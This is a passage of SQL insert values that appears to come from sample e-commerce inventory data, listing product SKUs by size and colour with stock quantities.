(249, 'default', 'MH12-M-Green', 100.0000, 1),
(250, 'default', 'MH12-M-Red', 100.0000, 1),
(251, 'default', 'MH12-L-Blue', 100.0000, 1),
(252, 'default', 'MH12-L-Green', 100.0000, 1),
(253, 'default', 'MH12-L-Red', 100.0000, 1),
(254, 'default', 'MH12-XL-Blue', 100.0000, 1),
(255, 'default', 'MH12-XL-Green', 100.0000, 1),
(256, 'default', 'MH12-XL-Red', 100.0000, 1),
(257, 'default', 'MH12', 0.0000, 1),
(258, 'default', 'MH13-XS-Blue', 100.0000, 1),
(259, 'default', 'MH13-XS-Green', 100.0000, 1),
(260, 'default', 'MH13-XS-Lavender', 100.0000, 1),
(261, 'default', 'MH13-S-Blue', 100.0000, 1),
(262, 'default', 'MH13-S-Green', 100.0000, 1),
(263, 'default', 'MH13-S-Lavender', 100.0000, 1),
(264, 'default', 'MH13-M-Blue', 100.0000, 1),
(265, 'default', 'MH13-M-Green', 100.0000, 1),
(266, 'default', 'MH13-M-Lavender', 100.0000, 1),
(267, 'default', 'MH13-L-Blue', 100.0000, 1),
(268, 'default', 'MH13-L-Green', 100.0000, 1),
(269, 'default', 'MH13-L-Lavender', 100.0000, 1),
(270, 'default', 'MH13-XL-Blue', 100.0000, 1),
(271, 'default', 'MH13-XL-Green', 100.0000, 1),
(272, 'default', 'MH13-XL-Lavender', 100.0000, 1),
(273, 'default', 'MH13', 0.0000, 1),
(274, 'default', 'MJ01-XS-Orange', 100.0000, 1),
(275, 'default', 'MJ01-XS-Red', 100.0000, 1),
(276, 'default', 'MJ01-XS-Yellow', 100.0000, 1),
(277, 'default', 'MJ01-S-Orange', 100.0000, 1),
(278, 'default', 'MJ01-S-Red', 100.0000, 1),
(279, 'default', 'MJ01-S-Yellow', 100.0000, 1),
(280, 'default', 'MJ01-M-Orange', 100.0000, 1),
(281, 'default', 'MJ01-M-Red', 100.0000, 1),
(282, 'default', 'MJ01-M-Yellow', 100.0000, 1),
(283, 'default', 'MJ01-L-Orange', 100.0000, 1),
(284, 'default', 'MJ01-L-Red', 100.0000, 1),
(285, 'default', 'MJ01-L-Yellow', 100.0000, 1),
(286, 'default', 'MJ01-XL-Orange', 100.0000, 1),
(287, 'default', 'MJ01-XL-Red', 100.0000, 1),
(288, 'default', 'MJ01-XL-Yellow', 100.0000, 1),
(289, 'default', 'MJ01', 0.0000, 1),
(290, 'default', 'MJ02-XS-Green', 100.0000, 1),
(291, 'default', 'MJ02-XS-Orange', 100.0000, 1),
(292, 'default', 'MJ02-XS-Red', 100.0000, 1),
(293, 'default', 'MJ02-S-Green', 100.0000, 1),
(294, 'default', 'MJ02-S-Orange', 100.0000, 1),
(295, 'default', 'MJ02-S-Red', 100.0000, 1),
(296, 'default', 'MJ02-M-Green', 100.0000, 1),
(297, 'default', 'MJ02-M-Orange', 100.0000, 1),
(298, 'default', 'MJ02-M-Red', 100.0000, 1),
(299, 'default', 'MJ02-L-Green', 100.0000, 1),
(300, 'default', 'MJ02-L-Orange', 100.0000, 1),
(301, 'default', 'MJ02-L-Red', 100.0000, 1),
(302, 'default', 'MJ02-XL-Green', 100.0000, 1),
(303, 'default', 'MJ02-XL-Orange', 100.0000, 1),
(304, 'default', 'MJ02-XL-Red', 100.0000, 1),
(305, 'default', 'MJ02', 0.0000, 1),
(306, 'default', 'MJ04-XS-Black', 100.0000, 1),
(307, 'default', 'MJ04-XS-Blue', 100.0000, 1),
(308, 'default', 'MJ04-XS-Purple', 100.0000, 1),
(309, 'default', 'MJ04-S-Black', 100.0000, 1),
(310, 'default', 'MJ04-S-Blue', 100.0000, 1),
(311, 'default', 'MJ04-S-Purple', 100.0000, 1),
(312, 'default', 'MJ04-M-Black', 100.0000, 1),
(313, 'default', 'MJ04-M-Blue', 100.0000, 1),
(314, 'default', 'MJ04-M-Purple', 100.0000, 1),
(315, 'default', 'MJ04-L-Black', 100.0000, 1),
(316, 'default', 'MJ04-L-Blue', 100.0000, 1),
(317, 'default', 'MJ04-L-Purple', 100.0000, 1),
(318, 'default', 'MJ04-XL-Black', 100.0000, 1),
(319, 'default', 'MJ04-XL-Blue', 100.0000, 1),
(320, 'default', 'MJ04-XL-Purple', 100.0000, 1),
(321, 'default', 'MJ04', 0.0000, 1),
(322, 'default', 'MJ07-XS-Black', 100.0000, 1),
(323, 'default', 'MJ07-XS-Red', 100.0000, 1),
(324, 'default', 'MJ07-XS-Yellow', 100.0000, 1),
(325, 'default', 'MJ07-S-Black', 100.0000, 1),
(326, 'default', 'MJ07-S-Red', 100.0000, 1),
(327, 'default', 'MJ07-S-Yellow', 100.0000, 1),
(328, 'default', 'MJ07-M-Black', 100.0000, 1),
(329, 'default', 'MJ07-M-Red', 100.0000, 1),
(330, 'default', 'MJ07-M-Yellow', 100.0000, 1),
(331, 'default', 'MJ07-L-Black', 100.0000, 1),
(332, 'default', 'MJ07-L-Red', 100.0000, 1),
(333, 'default', 'MJ07-L-Yellow', 100.0000, 1),
(334, 'default', 'MJ07-XL-Black', 100.0000, 1),
(335, 'default', 'MJ07-XL-Red', 100.0000, 1),
(336, 'default', 'MJ07-XL-Yellow', 100.0000, 1),
(337, 'default', 'MJ07', 0.0000, 1),
(338, 'default', 'MJ08-XS-Blue', 100.0000, 1),
(339, 'default', 'MJ08-XS-Gray', 100.0000, 1),
(340, 'default', 'MJ08-XS-Green', 100.0000, 1),
(341, 'default', 'MJ08-S-Blue', 100.0000, 1),
(342, 'default', 'MJ08-S-Gray', 100.0000, 1),
(343, 'default', 'MJ08-S-Green', 100.0000, 1),
(344, 'default', 'MJ08-M-Blue', 100.0000, 1),
(345, 'default', 'MJ08-M-Gray', 100.0000, 1),
(346, 'default', 'MJ08-M-Green', 100.0000, 1),
(347, 'default', 'MJ08-L-Blue', 100.0000, 1),
(348, 'default', 'MJ08-L-Gray', 100.0000, 1),
(349, 'default', 'MJ08-L-Green', 100.0000, 1),
(350, 'default', 'MJ08-XL-Blue', 100.0000, 1),
(351, 'default', 'MJ08-XL-Gray', 100.0000, 1),
(352, 'default', 'MJ08-XL-Green', 100.0000, 1),
(353, 'default', 'MJ08', 0.0000, 1),
(354, 'default', 'MJ09-XS-Blue', 100.0000, 1),
(355, 'default', 'MJ09-XS-White', 100.0000, 1),
(356, 'default', 'MJ09-XS-Yellow', 100.0000, 1),
(357, 'default', 'MJ09-S-Blue', 100.0000, 1),
(358, 'default', 'MJ09-S-White', 100.0000, 1),
(359, 'default', 'MJ09-S-Yellow', 100.0000, 1),
(360, 'default', 'MJ09-M-Blue', 100.0000, 1),
(361, 'default', 'MJ09-M-White', 100.0000, 1),
(362, 'default', 'MJ09-M-Yellow', 100.0000, 1),
(363, 'default', 'MJ09-L-Blue', 100.0000, 1),
(364, 'default', 'MJ09-L-White', 100.0000, 1),
(365, 'default', 'MJ09-L-Yellow', 100.0000, 1),
(366, 'default', 'MJ09-XL-Blue', 100.0000, 1),
(367, 'default', 'MJ09-XL-White', 100.0000, 1),
(368, 'default', 'MJ09-XL-Yellow', 100.0000, 1),
(369, 'default', 'MJ09', 0.0000, 1),
(370, 'default', 'MJ10-XS-Black', 100.0000, 1),
(371, 'default', 'MJ10-XS-Orange', 100.0000, 1),
(372, 'default', 'MJ10-XS-Red', 100.0000, 1),
(373, 'default', 'MJ10-S-Black', 100.0000, 1),
(374, 'default', 'MJ10-S-Orange', 100.0000, 1),
(375, 'default', 'MJ10-S-Red', 100.0000, 1),
(376, 'default', 'MJ10-M-Black', 100.0000, 1),
(377, 'default', 'MJ10-M-Orange', 100.0000, 1),
(378, 'default', 'MJ10-M-Red', 100.0000, 1),
(379, 'default', 'MJ10-L-Black', 100.0000, 1),
(380, 'default', 'MJ10-L-Orange', 100.0000, 1),
(381, 'default', 'MJ10-L-Red', 100.0000, 1),
(382, 'default', 'MJ10-XL-Black', 100.0000, 1),
(383, 'default', 'MJ10-XL-Orange', 100.0000, 1),
(384, 'default', 'MJ10-XL-Red', 100.0000, 1),
(385, 'default', 'MJ10', 0.0000, 1),
(386, 'default', 'MJ11-XS-Black', 100.0000, 1),
(387, 'default', 'MJ11-XS-Green', 100.0000, 1),
(388, 'default', 'MJ11-XS-Red', 100.0000, 1),
(389, 'default', 'MJ11-S-Black', 100.0000, 1),
(390, 'default', 'MJ11-S-Green', 100.0000, 1),
(391, 'default', 'MJ11-S-Red', 100.0000, 1),
(392, 'default', 'MJ11-M-Black', 100.0000, 1),
(393, 'default', 'MJ11-M-Green', 100.0000, 1),
(394, 'default', 'MJ11-M-Red', 100.0000, 1),
(395, 'default', 'MJ11-L-Black', 100.0000, 1),
(396, 'default', 'MJ11-L-Green', 100.0000, 1),
(397, 'default', 'MJ11-L-Red', 100.0000, 1),
(398, 'default', 'MJ11-XL-Black', 100.0000, 1),
(399, 'default', 'MJ11-XL-Green', 100.0000, 1),
(400, 'default', 'MJ11-XL-Red', 100.0000, 1),
(401, 'default', 'MJ11', 0.0000, 1),
(402, 'default', 'MJ06-XS-Blue', 100.0000, 1),
(403, 'default', 'MJ06-XS-Green', 100.0000, 1),
(404, 'default', 'MJ06-XS-Purple', 100.0000, 1),
(405, 'default', 'MJ06-S-Blue', 100.0000, 1),
(406, 'default', 'MJ06-S-Green', 100.0000, 1),
(407, 'default', 'MJ06-S-Purple', 100.0000, 1),
(408, 'default', 'MJ06-M-Blue', 100.0000, 1),
(409, 'default', 'MJ06-M-Green', 100.0000, 1),
(410, 'default', 'MJ06-M-Purple', 100.0000, 1),
(411, 'default', 'MJ06-L-Blue', 100.0000, 1),
(412, 'default', 'MJ06-L-Green', 100.0000, 1),
(413, 'default', 'MJ06-L-Purple', 100.0000, 1),
(414, 'default', 'MJ06-XL-Blue', 100.0000, 1),
(415, 'default', 'MJ06-XL-Green', 100.0000, 1),
(416, 'default', 'MJ06-XL-Purple', 100.0000, 1),
(417, 'default', 'MJ06', 0.0000, 1),
(418, 'default', 'MJ03-XS-Black', 100.0000, 1),
(419, 'default', 'MJ03-XS-Green', 100.0000, 1),
(420, 'default', 'MJ03-XS-Red', 100.0000, 1),
(421, 'default', 'MJ03-S-Black', 100.0000, 1),
(422, 'default', 'MJ03-S-Green', 100.0000, 1),
(423, 'default', 'MJ03-S-Red', 100.0000, 1),
(424, 'default', 'MJ03-M-Black', 100.0000, 1),
(425, 'default', 'MJ03-M-Green', 100.0000, 1),
(426, 'default', 'MJ03-M-Red', 100.0000, 1),
(427, 'default', 'MJ03-L-Black', 100.0000, 1),
(428, 'default', 'MJ03-L-Green', 100.0000, 1),
(429, 'default', 'MJ03-L-Red', 100.0000, 1),
(430, 'default', 'MJ03-XL-Black', 100.0000, 1),
(431, 'default', 'MJ03-XL-Green', 100.0000, 1),
(432, 'default', 'MJ03-XL-Red', 100.0000, 1),
(433, 'default', 'MJ03', 0.0000, 1),
(434, 'default', 'MJ12-XS-Black', 100.0000, 1),
(435, 'default', 'MJ12-XS-Blue', 100.0000, 1),
(436, 'default', 'MJ12-XS-Orange', 100.0000, 1),
(437, 'default', 'MJ12-S-Black', 100.0000, 1),
(438, 'default', 'MJ12-S-Blue', 100.0000, 1),
(439, 'default', 'MJ12-S-Orange', 100.0000, 1),
(440, 'default', 'MJ12-M-Black', 100.0000, 1),
(441, 'default', 'MJ12-M-Blue', 100.0000, 1),
(442, 'default', 'MJ12-M-Orange', 100.0000, 1),
(443, 'default', 'MJ12-L-Black', 100.0000, 1),
(444, 'default', 'MJ12-L-Blue', 100.0000, 1),
(445, 'default', 'MJ12-L-Orange', 100.0000, 1),
(446, 'default', 'MJ12-XL-Black', 100.0000, 1),
(447, 'default', 'MJ12-XL-Blue', 100.0000, 1),
(448, 'default', 'MJ12-XL-Orange', 100.0000, 1),
(449, 'default', 'MJ12', 0.0000, 1),
(450, 'default', 'MS04-XS-Black', 100.0000, 1),
(451, 'default', 'MS04-XS-Orange', 100.0000, 1),
(452, 'default', 'MS04-XS-Red', 100.0000, 1),
(453, 'default', 'MS04-S-Black', 100.0000, 1),
(454, 'default', 'MS04-S-Orange', 100.0000, 1),
(455, 'default', 'MS04-S-Red', 100.0000, 1),
(456, 'default', 'MS04-M-Black', 100.0000, 1),
(457, 'default', 'MS04-M-Orange', 100.0000, 1),
(458, 'default', 'MS04-M-Red', 100.0000, 1),
(459, 'default', 'MS04-L-Black', 100.0000, 1),
(460, 'default', 'MS04-L-Orange', 100.0000, 1),
(461, 'default', 'MS04-L-Red', 100.0000, 1),
(462, 'default', 'MS04-XL-Black', 100.0000, 1),
(463, 'default', 'MS04-XL-Orange', 100.0000, 1),
(464, 'default', 'MS04-XL-Red', 100.0000, 1),
(465, 'default', 'MS04', 0.0000, 1),
(466, 'default', 'MS05-XS-Black', 100.0000, 1),
(467, 'default', 'MS05-XS-Blue', 100.0000, 1),
(468, 'default', 'MS05-XS-Purple', 100.0000, 1),
(469, 'default', 'MS05-S-Black', 100.0000, 1),
(470, 'default', 'MS05-S-Blue', 100.0000, 1),
(471, 'default', 'MS05-S-Purple', 100.0000, 1),
(472, 'default', 'MS05-M-Black', 100.0000, 1),
(473, 'default', 'MS05-M-Blue', 100.0000, 1),
(474, 'default', 'MS05-M-Purple', 100.0000, 1),
(475, 'default', 'MS05-L-Black', 100.0000, 1),
(476, 'default', 'MS05-L-Blue', 100.0000, 1),
(477, 'default', 'MS05-L-Purple', 100.0000, 1),
(478, 'default', 'MS05-XL-Black', 100.0000, 1),
(479, 'default', 'MS05-XL-Blue', 100.0000, 1),
(480, 'default', 'MS05-XL-Purple', 100.0000, 1),
(481, 'default', 'MS05', 0.0000, 1),
(482, 'default', 'MS09-XS-Black', 100.0000, 1),
(483, 'default', 'MS09-XS-Blue', 100.0000, 1),
(484, 'default', 'MS09-XS-Red', 100.0000, 1),
(485, 'default', 'MS09-S-Black', 100.0000, 1),
(486, 'default', 'MS09-S-Blue', 100.0000, 1),
(487, 'default', 'MS09-S-Red', 100.0000, 1),
(488, 'default', 'MS09-M-Black', 100.0000, 1),
(489, 'default', 'MS09-M-Blue', 100.0000, 1),
(490, 'default', 'MS09-M-Red', 100.0000, 1),
(491, 'default', 'MS09-L-Black', 100.0000, 1),
(492, 'default', 'MS09-L-Blue', 100.0000, 1),
(493, 'default', 'MS09-L-Red', 100.0000, 1),
(494, 'default', 'MS09-XL-Black', 100.0000, 1),
(495, 'default', 'MS09-XL-Blue', 100.0000, 1),
(496, 'default', 'MS09-XL-Red', 100.0000, 1),
(497, 'default', 'MS09', 0.0000, 1),
(498, 'default', 'MS11-XS-Blue', 100.0000, 1),
(499, 'default', 'MS11-XS-Green', 100.0000, 1),
(500, 'default', 'MS11-XS-Yellow', 100.0000, 1),
(501, 'default', 'MS11-S-Blue', 100.0000, 1),
(502, 'default', 'MS11-S-Green', 100.0000, 1),
(503, 'default', 'MS11-S-Yellow', 100.0000, 1),
(504, 'default', 'MS11-M-Blue', 100.0000, 1),
(505, 'default', 'MS11-M-Green', 100.0000, 1),
(506, 'default', 'MS11-M-Yellow', 100.0000, 1),
(507, 'default', 'MS11-L-Blue', 100.0000, 1),
(508, 'default', 'MS11-L-Green', 100.0000, 1),
(509, 'default', 'MS11-L-Yellow', 100.0000, 1),
(510, 'default', 'MS11-XL-Blue', 100.0000, 1),
(511, 'default', 'MS11-XL-Green', 100.0000, 1),
(512, 'default', 'MS11-XL-Yellow', 100.0000, 1),
(513, 'default', 'MS11', 0.0000, 1),
(514, 'default', 'MS12-XS-Black', 100.0000, 1),
(515, 'default', 'MS12-XS-Blue', 100.0000, 1),
(516, 'default', 'MS12-XS-Red', 100.0000, 1),
(517, 'default', 'MS12-S-Black', 100.0000, 1),
(518, 'default', 'MS12-S-Blue', 100.0000, 1),
(519, 'default', 'MS12-S-Red', 100.0000, 1),
(520, 'default', 'MS12-M-Black', 100.0000, 1),
(521, 'default', 'MS12-M-Blue', 100.0000, 1),
(522, 'default', 'MS12-M-Red', 100.0000, 1),
(523, 'default', 'MS12-L-Black', 100.0000, 1),
(524, 'default', 'MS12-L-Blue', 100.0000, 1),
(525, 'default', 'MS12-L-Red', 100.0000, 1),
(526, 'default', 'MS12-XL-Black', 100.0000, 1),
(527, 'default', 'MS12-XL-Blue', 100.0000, 1),
(528, 'default', 'MS12-XL-Red', 100.0000, 1),
(529, 'default', 'MS12', 0.0000, 1),
(530, 'default', 'MS03-XS-Gray', 100.0000, 1),
(531, 'default', 'MS03-XS-Green', 100.0000, 1),
(532, 'default', 'MS03-XS-Orange', 100.0000, 1),
(533, 'default', 'MS03-S-Gray', 100.0000, 1),
(534, 'default', 'MS03-S-Green', 100.0000, 1),
(535, 'default', 'MS03-S-Orange', 100.0000, 1),
(536, 'default', 'MS03-M-Gray', 100.0000, 1),
(537, 'default', 'MS03-M-Green', 100.0000, 1),
(538, 'default', 'MS03-M-Orange', 100.0000, 1),
(539, 'default', 'MS03-L-Gray', 100.0000, 1),
(540, 'default', 'MS03-L-Green', 100.0000, 1),
(541, 'default', 'MS03-L-Orange', 100.0000, 1),
(542, 'default', 'MS03-XL-Gray', 100.0000, 1),
(543, 'default', 'MS03-XL-Green', 100.0000, 1),
(544, 'default', 'MS03-XL-Orange', 100.0000, 1),
(545, 'default', 'MS03', 0.0000, 1),
(546, 'default', 'MS06-XS-Blue', 100.0000, 1),
(547, 'default', 'MS06-XS-Green', 100.0000, 1),
(548, 'default', 'MS06-XS-Yellow', 100.0000, 1),
(549, 'default', 'MS06-S-Blue', 100.0000, 1),
(550, 'default', 'MS06-S-Green', 100.0000, 1),
(551, 'default', 'MS06-S-Yellow', 100.0000, 1),
(552, 'default', 'MS06-M-Blue', 100.0000, 1),
(553, 'default', 'MS06-M-Green', 100.0000, 1),
(554, 'default', 'MS06-M-Yellow', 100.0000, 1),
(555, 'default', 'MS06-L-Blue', 100.0000, 1),
(556, 'default', 'MS06-L-Green', 100.0000, 1),
(557, 'default', 'MS06-L-Yellow', 100.0000, 1),
(558, 'default', 'MS06-XL-Blue', 100.0000, 1),
(559, 'default', 'MS06-XL-Green', 100.0000, 1),
(560, 'default', 'MS06-XL-Yellow', 100.0000, 1),
(561, 'default', 'MS06', 0.0000, 1),
(562, 'default', 'MS01-XS-Black', 100.0000, 1),
(563, 'default', 'MS01-XS-Brown', 100.0000, 1),
(564, 'default', 'MS01-XS-Yellow', 100.0000, 1),
(565, 'default', 'MS01-S-Black', 100.0000, 1),
(566, 'default', 'MS01-S-Brown', 100.0000, 1),
(567, 'default', 'MS01-S-Yellow', 100.0000, 1),
(568, 'default', 'MS01-M-Black', 100.0000, 1),
(569, 'default', 'MS01-M-Brown', 100.0000, 1),
(570, 'default', 'MS01-M-Yellow', 100.0000, 1),
(571, 'default', 'MS01-L-Black', 100.0000, 1),
(572, 'default', 'MS01-L-Brown', 100.0000, 1),
(573, 'default', 'MS01-L-Yellow', 100.0000, 1),
(574, 'default', 'MS01-XL-Black', 100.0000, 1),
(575, 'default', 'MS01-XL-Brown', 100.0000, 1),
(576, 'default', 'MS01-XL-Yellow', 100.0000, 1),
(577, 'default', 'MS01', 0.0000, 1),
(578, 'default', 'MS02-XS-Black', 100.0000, 1),
(579, 'default', 'MS02-XS-Blue', 100.0000, 1),
(580, 'default', 'MS02-XS-Gray', 100.0000, 1),
(581, 'default', 'MS02-S-Black', 100.0000, 1),
(582, 'default', 'MS02-S-Blue', 100.0000, 1),
(583, 'default', 'MS02-S-Gray', 100.0000, 1),
(584, 'default', 'MS02-M-Black', 100.0000, 1),
(585, 'default', 'MS02-M-Blue', 100.0000, 1),
(586, 'default', 'MS02-M-Gray', 100.0000, 1),
(587, 'default', 'MS02-L-Black', 100.0000, 1),
(588, 'default', 'MS02-L-Blue', 100.0000, 1),
(589, 'default', 'MS02-L-Gray', 100.0000, 1),
(590, 'default', 'MS02-XL-Black', 100.0000, 1),
(591, 'default', 'MS02-XL-Blue', 100.0000, 1),
(592, 'default', 'MS02-XL-Gray', 100.0000, 1),
(593, 'default', 'MS02', 0.0000, 1),
(594, 'default', 'MS10-XS-Black', 100.0000, 1),
(595, 'default', 'MS10-XS-Blue', 100.0000, 1),
(596, 'default', 'MS10-XS-Red', 100.0000, 1),
(597, 'default', 'MS10-S-Black', 100.0000, 1),
(598, 'default', 'MS10-S-Blue', 100.0000, 1),
(599, 'default', 'MS10-S-Red', 100.0000, 1),
(600, 'default', 'MS10-M-Black', 100.0000, 1),
(601, 'default', 'MS10-M-Blue', 100.0000, 1),
(602, 'default', 'MS10-M-Red', 100.0000, 1),
(603, 'default', 'MS10-L-Black', 100.0000, 1),
(604, 'default', 'MS10-L-Blue', 100.0000, 1),
(605, 'default', 'MS10-L-Red', 100.0000, 1),
(606, 'default', 'MS10-XL-Black', 100.0000, 1),
(607, 'default', 'MS10-XL-Blue', 100.0000, 1),
(608, 'default', 'MS10-XL-Red', 100.0000, 1),
(609, 'default', 'MS10', 0.0000, 1),
(610, 'default', 'MS07-XS-Black', 100.0000, 1),
(611, 'default', 'MS07-XS-Green', 100.0000, 1),
(612, 'default', 'MS07-XS-White', 100.0000, 1),
(613, 'default', 'MS07-S-Black', 100.0000, 1),
(614, 'default', 'MS07-S-Green', 100.0000, 1),
(615, 'default', 'MS07-S-White', 100.0000, 1),
(616, 'default', 'MS07-M-Black', 100.0000, 1),
(617, 'default', 'MS07-M-Green', 100.0000, 1),
(618, 'default', 'MS07-M-White', 100.0000, 1),
(619, 'default', 'MS07-L-Black', 100.0000, 1),
(620, 'default', 'MS07-L-Green', 100.0000, 1),
(621, 'default', 'MS07-L-White', 100.0000, 1),
(622, 'default', 'MS07-XL-Black', 100.0000, 1),
(623, 'default', 'MS07-XL-Green', 100.0000, 1),
(624, 'default', 'MS07-XL-White', 100.0000, 1),
(625, 'default', 'MS07', 0.0000, 1),
(626, 'default', 'MS08-XS-Black', 100.0000, 1),
(627, 'default', 'MS08-XS-Blue', 100.0000, 1),
(628, 'default', 'MS08-XS-Red', 100.0000, 1),
(629, 'default', 'MS08-S-Black', 100.0000, 1),
(630, 'default', 'MS08-S-Blue', 100.0000, 1),
(631, 'default', 'MS08-S-Red', 100.0000, 1),
(632, 'default', 'MS08-M-Black', 100.0000, 1),
(633, 'default', 'MS08-M-Blue', 100.0000, 1),
(634, 'default', 'MS08-M-Red', 100.0000, 1),
(635, 'default', 'MS08-L-Black', 100.0000, 1),
(636, 'default', 'MS08-L-Blue', 100.0000, 1),
(637, 'default', 'MS08-L-Red', 100.0000, 1),
(638, 'default', 'MS08-XL-Black', 100.0000, 1),
(639, 'default', 'MS08-XL-Blue', 100.0000, 1),
(640, 'default', 'MS08-XL-Red', 100.0000, 1),
(641, 'default', 'MS08', 0.0000, 1),
(642, 'default', 'MT01-XS-Gray', 100.0000, 1),
(643, 'default', 'MT01-XS-Orange', 100.0000, 1),
(644, 'default', 'MT01-XS-Red', 100.0000, 1),
(645, 'default', 'MT01-S-Gray', 100.0000, 1),
(646, 'default', 'MT01-S-Orange', 100.0000, 1),
(647, 'default', 'MT01-S-Red', 100.0000, 1),
(648, 'default', 'MT01-M-Gray', 100.0000, 1),
(649, 'default', 'MT01-M-Orange', 100.0000, 1),
(650, 'default', 'MT01-M-Red', 100.0000, 1),
(651, 'default', 'MT01-L-Gray', 100.0000, 1),
(652, 'default', 'MT01-L-Orange', 100.0000, 1),
(653, 'default', 'MT01-L-Red', 100.0000, 1),
(654, 'default', 'MT01-XL-Gray', 100.0000, 1),
(655, 'default', 'MT01-XL-Orange', 100.0000, 1),
(656, 'default', 'MT01-XL-Red', 100.0000, 1),
(657, 'default', 'MT01', 0.0000, 1),
(658, 'default', 'MT02-XS-Gray', 100.0000, 1),
(659, 'default', 'MT02-XS-Red', 100.0000, 1),
(660, 'default', 'MT02-XS-White', 100.0000, 1),
(661, 'default', 'MT02-S-Gray', 100.0000, 1),
(662, 'default', 'MT02-S-Red', 100.0000, 1),
(663, 'default', 'MT02-S-White', 100.0000, 1),
(664, 'default', 'MT02-M-Gray', 100.0000, 1),
(665, 'default', 'MT02-M-Red', 100.0000, 1),
(666, 'default', 'MT02-M-White', 100.0000, 1),
(667, 'default', 'MT02-L-Gray', 100.0000, 1),
(668, 'default', 'MT02-L-Red', 100.0000, 1),
(669, 'default', 'MT02-L-White', 100.0000, 1),
(670, 'default', 'MT02-XL-Gray', 100.0000, 1),
(671, 'default', 'MT02-XL-Red', 100.0000, 1),
(672, 'default', 'MT02-XL-White', 100.0000, 1),
(673, 'default', 'MT02', 0.0000, 1),
(674, 'default', 'MT03-XS-Blue', 100.0000, 1),
(675, 'default', 'MT03-XS-Red', 100.0000, 1),
(676, 'default', 'MT03-XS-Yellow', 100.0000, 1),
(677, 'default', 'MT03-S-Blue', 100.0000, 1),
(678, 'default', 'MT03-S-Red', 100.0000, 1),
(679, 'default', 'MT03-S-Yellow', 100.0000, 1),
(680, 'default', 'MT03-M-Blue', 100.0000, 1),
(681, 'default', 'MT03-M-Red', 100.0000, 1),
(682, 'default', 'MT03-M-Yellow', 100.0000, 1),
(683, 'default', 'MT03-L-Blue', 100.0000, 1),
(684, 'default', 'MT03-L-Red', 100.0000, 1),
(685, 'default', 'MT03-L-Yellow', 100.0000, 1),
(686, 'default', 'MT03-XL-Blue', 100.0000, 1),
(687, 'default', 'MT03-XL-Red', 100.0000, 1),
(688, 'default', 'MT03-XL-Yellow', 100.0000, 1),
(689, 'default', 'MT03', 0.0000, 1),
(690, 'default', 'MT04-XS-Blue', 100.0000, 1),
(691, 'default', 'MT04-S-Blue', 100.0000, 1),
(692, 'default', 'MT04-M-Blue', 100.0000, 1),
(693, 'default', 'MT04-L-Blue', 100.0000, 1),
(694, 'default', 'MT04-XL-Blue', 100.0000, 1),
(695, 'default', 'MT04', 0.0000, 1),
(696, 'default', 'MT05-XS-Blue', 100.0000, 1),
(697, 'default', 'MT05-S-Blue', 100.0000, 1),
(698, 'default', 'MT05-M-Blue', 100.0000, 1),
(699, 'default', 'MT05-L-Blue', 100.0000, 1),
(700, 'default', 'MT05-XL-Blue', 100.0000, 1),
(701, 'default', 'MT05', 0.0000, 1),
(702, 'default', 'MT06-XS-Black', 100.0000, 1),
(703, 'default', 'MT06-S-Black', 100.0000, 1),
(704, 'default', 'MT06-M-Black', 100.0000, 1),
(705, 'default', 'MT06-L-Black', 100.0000, 1),
(706, 'default', 'MT06-XL-Black', 100.0000, 1),
(707, 'default', 'MT06', 0.0000, 1),
(708, 'default', 'MT07-XS-Gray', 100.0000, 1),
(709, 'default', 'MT07-S-Gray', 100.0000, 1),
(710, 'default', 'MT07-M-Gray', 100.0000, 1),
(711, 'default', 'MT07-L-Gray', 100.0000, 1),
(712, 'default', 'MT07-XL-Gray', 100.0000, 1),
(713, 'default', 'MT07', 0.0000, 1),
(714, 'default', 'MT08-XS-Green', 100.0000, 1),
(715, 'default', 'MT08-S-Green', 100.0000, 1),
(716, 'default', 'MT08-M-Green', 100.0000, 1),
(717, 'default', 'MT08-L-Green', 100.0000, 1),
(718, 'default', 'MT08-XL-Green', 100.0000, 1),
(719, 'default', 'MT08', 0.0000, 1),
(720, 'default', 'MT09-XS-Blue', 100.0000, 1),
(721, 'default', 'MT09-S-Blue', 100.0000, 1),
(722, 'default', 'MT09-M-Blue', 100.0000, 1),
(723, 'default', 'MT09-L-Blue', 100.0000, 1),
(724, 'default', 'MT09-XL-Blue', 100.0000, 1),
(725, 'default', 'MT09', 0.0000, 1),
(726, 'default', 'MT10-XS-Yellow', 100.0000, 1),
(727, 'default', 'MT10-S-Yellow', 100.0000, 1),
(728, 'default', 'MT10-M-Yellow', 100.0000, 1),
(729, 'default', 'MT10-L-Yellow', 100.0000, 1),
(730, 'default', 'MT10-XL-Yellow', 100.0000, 1),
(731, 'default', 'MT10', 0.0000, 1),
(732, 'default', 'MT11-XS-Blue', 100.0000, 1),
(733, 'default', 'MT11-S-Blue', 100.0000, 1),
(734, 'default', 'MT11-M-Blue', 100.0000, 1),
(735, 'default', 'MT11-L-Blue', 100.0000, 1),
(736, 'default', 'MT11-XL-Blue', 100.0000, 1),
(737, 'default', 'MT11', 0.0000, 1),
(738, 'default', 'MT12-XS-Blue', 100.0000, 1),
(739, 'default', 'MT12-S-Blue', 100.0000, 1),
(740, 'default', 'MT12-M-Blue', 100.0000, 1),
(741, 'default', 'MT12-L-Blue', 100.0000, 1),
(742, 'default', 'MT12-XL-Blue', 100.0000, 1),
(743, 'default', 'MT12', 0.0000, 1),
(744, 'default', 'MP01-32-Black', 100.0000, 1),
(745, 'default', 'MP01-32-Gray', 100.0000, 1),
(746, 'default', 'MP01-32-Purple', 100.0000, 1),
(747, 'default', 'MP01-33-Black', 100.0000, 1),
(748, 'default', 'MP01-33-Gray', 100.0000, 1),
(749, 'default', 'MP01-33-Purple', 100.0000, 1),
(750, 'default', 'MP01-34-Black', 100.0000, 1),
(751, 'default', 'MP01-34-Gray', 100.0000, 1),
(752, 'default', 'MP01-34-Purple', 100.0000, 1),
(753, 'default', 'MP01-36-Black', 100.0000, 1),
(754, 'default', 'MP01-36-Gray', 100.0000, 1),
(755, 'default', 'MP01-36-Purple', 100.0000, 1),
(756, 'default', 'MP01', 0.0000, 1),
(757, 'default', 'MP02-32-Blue', 100.0000, 1),
(758, 'default', 'MP02-32-Gray', 100.0000, 1),
(759, 'default', 'MP02-32-Red', 100.0000, 1),
(760, 'default', 'MP02-33-Blue', 100.0000, 1),
(761, 'default', 'MP02-33-Gray', 100.0000, 1),
(762, 'default', 'MP02-33-Red', 100.0000, 1),
(763, 'default', 'MP02-34-Blue', 100.0000, 1),
(764, 'default', 'MP02-34-Gray', 100.0000, 1),
(765, 'default', 'MP02-34-Red', 100.0000, 1),
(766, 'default', 'MP02-36-Blue', 100.0000, 1),
(767, 'default', 'MP02-36-Gray', 100.0000, 1),
